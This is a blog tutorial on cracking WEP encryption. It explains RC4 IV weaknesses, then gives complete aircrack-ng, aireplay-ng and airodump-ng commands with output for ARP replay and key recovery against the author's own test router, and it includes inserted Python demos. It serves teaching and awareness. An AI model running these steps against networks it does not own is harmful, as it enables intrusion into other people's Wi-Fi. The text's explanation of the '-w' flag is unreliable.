Playing with other people's Wi-Fi, part 1: The good old “WEP”

Many of us own a Wi-Fi network at home. It is great, convenient, and no cables! When this technology first came into existence there were several competitors available as well (remember DECT? [wikipedia.org]). One of the key points for the Wi-Fi developers was to drive the cost of equipment down, and in doing so they inevitably created two problems. Let me quickly talk about some basic issues in Wi-Fi and then we will move to the practical cracking of WEP encryption. I intend this article to be the first in a series, and I will mostly focus on end-user practicalities, only linking to the most interesting theory articles.


OK, so back to the problems inherited by Wi-Fi. The first is that, in order to make the equipment as cheap as possible, the standard nearly ignored the case of two Wi-Fi networks operating on the same channel. You might remember that Wi-Fi takes Ethernet's “Carrier sense multiple access with collision detection” (CSMA/CD) and extends it to “Carrier sense multiple access with collision avoidance” (CSMA/CA). The extension introduced some great new messages like CTS (Clear to Send) and RTS (Request to Send). These control messages basically hand control of access to the channel to the access point. The access point now manages all its clients to avoid collisions, but two independent access points pretty much do not care about each other, and we are back to the old CSMA/CD behaviour with back-off timers and retransmissions after collisions.

The second drawback is that, in order to win the Wi-Fi standards race, the creators built the initial security protection, called “Wired Equivalent Privacy” (or WEP [wikipedia.org]), in a rush and without any public testing. The 802.11 wireless standard won the race, but soon afterwards the WEP flaws were identified and it was proven to be very easily penetrated.

It is actually easy to explain why it is so vulnerable. The main point is that the encryption algorithm behind it is a stream cipher seeded with a combination of your “password” and a random 24-bit Initialization Vector (IV). Originally the WEP standard gave users a 40-bit password option and later also a 104-bit password option (always add the IV to get the 64-bit or 128-bit encryption key). This key then encrypts the traffic, while the continuously changing IV should provide protection against replay attacks. Technically, RC4 provides a continuous stream of key bits, and these bits are XORed with each bit of the underlying data.

Figure: WEP encryption, with RC4 generating the keystream for the XOR function [wikipedia.org]

But the main security failure of this mechanism is that the Initialization Vector is “only 24 bits” long and cannot protect the key in a busy network. For example, it is estimated that the IV loops every 5000 packets. In 2001 a passive attack was published by Fluhrer, Martin and Shamir: you only need to capture packets from the air and then run this attack on them to recover the key very easily. In summary, all you have to do to crack the key is to capture a very large number of packets, so that you get a large number of IVs, and then start cracking the WEP key. Depending on the target network's activity you can have the key in a few hours.

Furthermore, in 2007 the attack was significantly improved by a method called “ARP injection”. From this point on it was no longer a passive attack, and thanks to that the attack time shortened to a few minutes. The idea is simple: it is possible to recognize ARP (Address Resolution Protocol) packets in the encrypted network without knowing the encryption key, then spoof a deauthentication of the originating client and resend the captured ARP packet back to the network. Every resent ARP request lets you capture an additional IV by listening for the ARP reply. This is possible because the ARP packet structure is very static in nature and the ARP reply you get is always the same, only encrypted with a different IV. If you remember mathematics from school: when you get many ARP replies, you can essentially construct an equation with the plaintext and the password as static variables and only the IV varying. This helps the cracking process by several orders of magnitude.
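An added example (my own code, not from the original post) of the two points above: RC4 seeded with IV || key, and what an IV repeat hands to a passive listener. The key, IV and the two frames are constructed values, and the CRC-32 ICV trailer is left out because it plays no part in keystream reuse.

```python
import math

# Constructed sample values (not from the original post): a 40-bit WEP key and two
# short "frames" that happen to be sent under the same 24-bit IV.
WEP_KEY = bytes.fromhex("6170706c65")        # "apple", the test key used in the post
IV = bytes.fromhex("0a1b2c")                 # a 24-bit IV (constructed)
FRAME_1 = b"GET /index.html HTTP/1.0"
FRAME_2 = b"HELLO smtp.example.net  "


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by the output generator (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """WEP-style encryption: RC4 is seeded with IV || key and its keystream is
    XORed onto the frame body. The IV travels in clear in front of the frame.
    Decryption is the same operation. (ICV omitted; it is irrelevant here and
    in real WEP it is a CRC-32, which is not a cryptographic check.)"""
    if len(iv) != 3:
        raise ValueError("WEP IV must be 24 bits")
    return xor_bytes(data, rc4_keystream(iv + key, len(data)))


def keystream_reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under the same IV share one keystream, so C1 XOR C2 == P1 XOR P2:
    whoever knows (or can guess, e.g. an ARP header) one frame learns the other,
    and every such pair exposes keystream bytes without touching the key."""
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)
    return xor_bytes(c1, c2)


def frames_until_iv_repeat(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Birthday bound: frames needed before an IV repeats with the given probability
    when IVs are drawn uniformly at random (a plain counter repeats exactly every
    2**iv_bits frames instead). For 24 bits this is about 4800 frames."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    leak = keystream_reuse_leak(WEP_KEY, IV, FRAME_1, FRAME_2)
    print("C1 xor C2 == P1 xor P2:", leak == xor_bytes(FRAME_1, FRAME_2))
    print("frame 2 recovered from known frame 1:", xor_bytes(leak, FRAME_1))
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_repeat())
```

The birthday figure lands close to the rough 5000-packet loop the post mentions, which is why a busy network burns through its IV space in minutes.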


Practical example: how to crack WEP

First, let's look at what we need for this task. For moral and legal reasons, please get your own access point and configure it with WEP encryption. Then we need two PCs (technically possible with one PC and two Wi-Fi cards, but two PCs are better). One PC will act as a client (so that it generates traffic) and the other PC will be the attacker simulation.

TP-Link 722n

Regarding my personal hardware, I have used a TP-Link 722n wireless card, with a great external antenna adapter and good support from the hacking tools. As a target I used my TP-Link 741ND Wi-Fi router. As a test client I used my iPhone.

For the software you can go in two directions. I personally dual-boot with BackTrack Linux. This is an Ubuntu-based distribution designed for penetration testing; it comes with the best selection of security auditing and penetration testing tools, as well as already modified drivers that support advanced attacks like ARP injection (which a normal user does not need). You can also simply download this image and start it as a live CD (or from a USB stick). The second option is to start your own Linux distribution (yes, you need one) and install the aircrack-ng package; then run step 0 below to test it, and you may have to google whether your Wi-Fi card supports at least promiscuous mode of operation.

TP-Link 741nd

Step 0. Initialize airmon-ng and test packet injection

First, check whether your Wi-Fi card is recognized: as root, type “ifconfig” and look for any wlanX or athX interface. If it is in a down state, try “ifconfig -a” and then activate it with, for example, “ifconfig wlanX up”. In my example the card is wlan1 (wlan0 is the integrated Intel Wi-Fi, which is not really usable for attacks).

root@bt:~# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93
          inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
          inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15197 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15980 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4836106 (4.8 MB)  TX bytes:18487451 (18.4 MB)
          Interrupt:18

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:970 errors:0 dropped:0 overruns:0 frame:0
          TX packets:970 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:69553 (69.5 KB)  TX bytes:69553 (69.5 KB)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

So in the next step we activate the airmon-ng package; this puts the wlan1 card into monitor mode (note the “monitor mode enabled” line in the output) and creates the virtual interface mon0 that we will use for the attacks.

root@bt:~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1314    dhclient3
1525    dhclient3
11757   dhclient
Process with PID 1525 (dhclient3) is running on interface wlan0

Interface       Chipset         Driver

wlan1           Atheros AR9271  ath9k - [phy1]
                                (monitor mode enabled on mon0)
wlan0           Intel 3945ABG   iwl3945 - [phy0]

NOTE: Sometimes airmon-ng will tell you that there are programs running that can interfere with your network card and that you should close them, for example NetworkManager or a dhclient. Kill them with the kill <pid> command before continuing.

Let's look at ifconfig again; you will notice a new interface in the output.

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93  
          inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
          inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15684 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16179 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4898437 (4.8 MB)  TX bytes:18514654 (18.5 MB)
          Interrupt:18

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1011 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:72513 (72.5 KB)  TX bytes:72513 (72.5 KB)

mon0      Link encap:UNSPEC  HWaddr D8-5D-4C-91-AB-41-00-00-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:118351 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:28476367 (28.4 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Now let's test whether packet injection works. The test also looks around for networks on the same channel and tries to resend a few packets.

root@bt:~# aireplay-ng --test mon0
21:48:16  Trying broadcast probe requests...
21:48:16  Injection is working!
21:48:18  Found 1 APs

21:48:18  Trying directed probe requests...
21:48:19  F8:D1:11:37:C2:0E - channel: 6 - 'WEPcrackTest'
21:48:19  Ping (min/avg/max): 1.322ms/15.453ms/39.641ms Power: -88.62
21:48:19  29/30:  96%

Step 1. Find the target network using WEP

For our little test, I have configured my access point with a single Wi-Fi network called “WEPcrackTest”, and let's pretend that we didn't know this. I would personally use inSSIDer, but there are alternatives directly on Linux like “ssidsniff” or “iwlist scanning”. So for simplicity, let's try “iwlist scanning”. You can spot WEP-encrypted networks as follows: the corresponding Cell has no WPA/WPA2 mentioned and shows “Encryption key:on”, as indicated below.

root@bt:~# iwlist wlan1 scanning
wlan1     Scan completed :
          Cell 01 - Address: F8:D1:11:37:C2:0E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm  
                    Encryption key:on
                    ESSID:"WEPcrackTest"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000000021c87180
                    Extra: Last beacon: 576ms ago
                    IE: Unknown: 000C574550637261636B54657374
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 050400010000
                    IE: Unknown: 0706534B20010D14
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD3F0050F204104A00011010440001021047001000000000000010000000F8D11137C210103C000101104900140024E26002000101600000020001600100020001
                    IE: Unknown: DD050050F20500
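The rule just given (“Encryption key:on” and no WPA/WPA2 element) turned into a small audit script, added here as my own example rather than anything from the post. The scan text is constructed: cell 01 copies the post's access point, the other cells are invented; the script also handles the case where the driver prints the WPA or RSN element as an undecoded hex “IE: Unknown:” line, which the post's own output shows can happen.

```python
import re

# Constructed sample scan (not from the post): cell 01 copies the post's WEP AP, cells 02-03 are invented.
SAMPLE_SCAN = """\
wlan1     Scan completed :
          Cell 01 - Address: F8:D1:11:37:C2:0E
                    Channel:6
                    Encryption key:on
                    ESSID:"WEPcrackTest"
                    IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
          Cell 02 - Address: 00:11:22:33:44:55
                    Channel:11
                    Encryption key:on
                    ESSID:"HomeNet"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 03 - Address: 66:77:88:99:AA:BB
                    Channel:1
                    Encryption key:on
                    ESSID:"OldDriverNet"
                    IE: Unknown: 30140100000FAC040100000FAC040100000FAC020000
"""
CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")

def raw_ie_is_wpa(hexstr: str) -> bool:
    """WPA/RSN elements some drivers leave undecoded ('IE: Unknown: ...'):
    element id 0x30 is RSN (WPA2); 0xDD with OUI 00:50:F2 and type 01 is WPA.
    The post's DD18 0050F2 02 element is WMM, not WPA, and must not match."""
    h = hexstr.upper()
    return h.startswith("30") or (h.startswith("DD") and h[4:12] == "0050F201")

def parse_iwlist(text: str) -> list:
    """Split iwlist output into one dict per cell (bssid, essid, channel, enc, ies)."""
    cells, cur = [], None
    for line in text.splitlines():
        m = CELL_RE.search(line)
        if m:
            cur = {"bssid": m.group(1), "essid": "", "channel": None, "enc": False, "ies": []}
            cells.append(cur)
            continue
        s = line.strip()
        if cur is None:
            continue
        if s.startswith("ESSID:"):
            cur["essid"] = s[6:].strip('"')
        elif s.startswith("Channel:"):
            cur["channel"] = int(s[8:])
        elif s.startswith("Encryption key:"):
            cur["enc"] = s.endswith("on")
        elif s.startswith("IE:"):
            cur["ies"].append(s[3:].strip())
    return cells

def classify(cell: dict) -> str:
    """'open', 'wpa' (WPA or WPA2) or 'wep'; the post's rule: key on and no WPA element means WEP."""
    if not cell["enc"]:
        return "open"
    for ie in cell["ies"]:
        raw = ie[8:].strip() if ie.startswith("Unknown:") else ""
        if "WPA" in ie or (raw and raw_ie_is_wpa(raw)):
            return "wpa"
    return "wep"

def wep_networks(text: str) -> list:
    """(essid, bssid, channel) of every WEP cell: the list a network owner wants to see empty."""
    return [(c["essid"], c["bssid"], c["channel"]) for c in parse_iwlist(text) if classify(c) == "wep"]
```

Pipe a real scan in with `iwlist wlan1 scanning` and call `wep_networks()` on it; anything it returns on your own premises is a network to migrate off WEP.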

Step 2. Start capturing IVs

As in the historical passive attack, your first need is to capture enough IVs (at least 50,000) to have a chance of cracking the WEP encryption. This process is best run in parallel sessions, so please open another terminal window or use the “screen” command for a background session. We will use the airodump-ng command with “-c 6” telling it to capture on channel 6, “--bssid” specifying the MAC address of the access point's radio to select a target, and “-w” specifying the output file where the captured packets are stored. The last parameter is the interface identifier, and we use our “mon0”.

root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0
 CH  6 ][ Elapsed: 0 s ][ 2013-07-15 22:45                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                

 F8:D1:11:37:C2:0E  -71 100       27        0    0   6  54e. WEP  WEP         WEPcrackTest         

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

OK, start the capture and leave it running until we have a lot of IVs.

Step 3. ARP injection attack to speed up IV capture

The logic is as follows: we will do a fake authentication against the access point and wait for a captured ARP packet; once we capture one, we start resending it back to the network, and the replies to our replayed requests will let the capture from step 2 collect a large number of IVs. But for all this we first need to associate, using the aireplay-ng command as follows. “-1 0” is the attack type, in this case type 0, which is association only. “-e WEPcrackTest” is the name of the network to associate to, “-a F8:D1:11:37:C2:0E” is the access point MAC address again, “-h D8:5D:4C:91:AB:41” is the MAC address of your wireless card (find it in the ifconfig output), and at the end is the Wi-Fi interface mon0.

root@bt:~# aireplay-ng -1 0 -e WEPcrackTest -a F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:13:59  Sending Authentication Request
23:14:01  Authentication successful
23:14:03  Sending Association Request
23:14:04  Association successful :-)

The second part is to start listening for ARP packets and, if such a packet comes, initiate the retransmission. For this we use the aireplay-ng command with attack type “-3”; the Wi-Fi access point is “-b F8:D1:11:37:C2:0E”, your Wi-Fi interface MAC address is “-h D8:5D:4C:91:AB:41”, and we run this attack on interface mon0.

root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:22:55  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0715-232255.cap
You should also start airodump-ng to capture replies.
Read 290 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Great, notice the “sent 0 packets” at the end. Now we wait for some real client to connect; once it connects, the attack will start running automatically. In summary, right now you should have this replay attack running in one terminal and the capture from step 2 running in another.

Step 4. Simulating a legitimate user to start the ARP replay

This step is artificial in our example, as in a real attack you would just leave everything from the previous steps running and wait for some user on the network to send an ARP. To speed things up in our little test, I will connect my second interface card, wlan0, to the test network and generate an ARP manually. So this is how you connect to a WEP network (notice that at this point I am telling you the key, which is “apple”):

root@bt:~# iwconfig wlan0 essid WEPcrackTest
root@bt:~# iwconfig wlan0 channel 6
root@bt:~# iwconfig wlan0 enc on key s:apple
root@bt:~# ifconfig wlan0 up
root@bt:~# dhclient wlan0
There is already a pid file /var/run/dhclient.pid with pid 9745
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   Socket/fallback
DHCPREQUEST of 192.168.10.171 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.10.171 from 192.168.10.130
bound to 192.168.10.171 -- renewal in 111969 seconds.

Now let's have a look at the ARP table. You will most probably see that we have already resolved the default gateway during or after the DHCP negotiation, so we probably already have one ARP captured.

root@bt:~# arp -a
? (192.168.10.142) at 2c:59:e5:04:64:92 [ether] on eth0
? (192.168.10.130) at 00:0c:42:37:40:44 [ether] on wlan0

Now check your step 3 ARP replay attack to see whether it has already captured some ARP packets and is sending them back to the network. Most probably it will already be running crazy fast, sending all those ARP requests like below!

root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
19:09:05  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0716-190905.cap
You should also start airodump-ng to capture replies.
Read 286478 packets (got 91977 ARP requests and 95113 ACKs), sent 95116 packets...(500 pps)

Also, if you look at the capture from step 2, you will notice that the capture rate has accelerated several times. And notice that it is “as if” coming from the host with MAC address D8:5D:4C:91:AB:41. This is our wlan1 (mon0) MAC address, but this large number of packets is definitely not normal client traffic from that interface.

root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0
 CH  6 ][ Elapsed: 4 mins ][ 2013-07-16 19:13                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           

 F8:D1:11:37:C2:0E  -45  87     2884   107421  441   6  54e. WPA  WEP    OPN  WEPcrackTest    

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    

 F8:D1:11:37:C2:0E  D8:5D:4C:91:AB:41    0    0 - 1    765   234755                            
 F8:D1:11:37:C2:0E  00:1F:3C:37:D1:C5  -49   54e- 1e     0     1751  WEPcrackTest

Step 5. Wait and crack

Now we leave it running for a little while and periodically test whether we already have enough IVs to crack the key. In step 2 I used the parameter -w to capture all traffic to a file called WEP.cap (airodump-ng appends a sequence number, so on disk the file is WEP.cap-01.cap, as the output below shows). You will notice that the file size increases over time. We will use the aircrack-ng -w -b F8:D1:11:37:C2:0E ./WEP.cap command. The -w parameter says that we are going to attempt to crack the key from a file, -b specifies which access point's traffic is interesting for us (because in step 2 you could have captured from multiple networks at once), and at the end we specify the file to use as the source of data.

root@bt:~# aircrack-ng ./WEP.cap
Opening ./WEP.cap
Read 1459354 packets.

   #  BSSID              ESSID                     Encryption

   1  F8:D1:11:37:C2:0E  WEPcrackTest              WEP (336090 IVs)

Choosing first network as target.

Opening ./WEP.cap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 337296 ivs.
                     KEY FOUND! [ 61:70:70:6C:65 ] (ASCII: apple )
        Decrypted correctly: 100%

And there you have it: “KEY FOUND!”, and it is found as “ASCII: apple”. This was very easy, no?

Conclusion

In summary: whatever the reason, do not operate WEP encryption on your Wi-Fi network. I know that this is an old technology and, with standards like 802.11n no longer even having direct support for it, it will eventually die. But until then: I have scanned the area around my home with a 24 dB antenna and located three WEP-encrypted networks out of the 27 networks around. So there are still people who can be exploited and probably have no idea about it. Make sure you are not one of them.

I am already writing the next part, about cracking WPA/WPA2 using the WPS vulnerabilities.

---
Peter Havrila, published on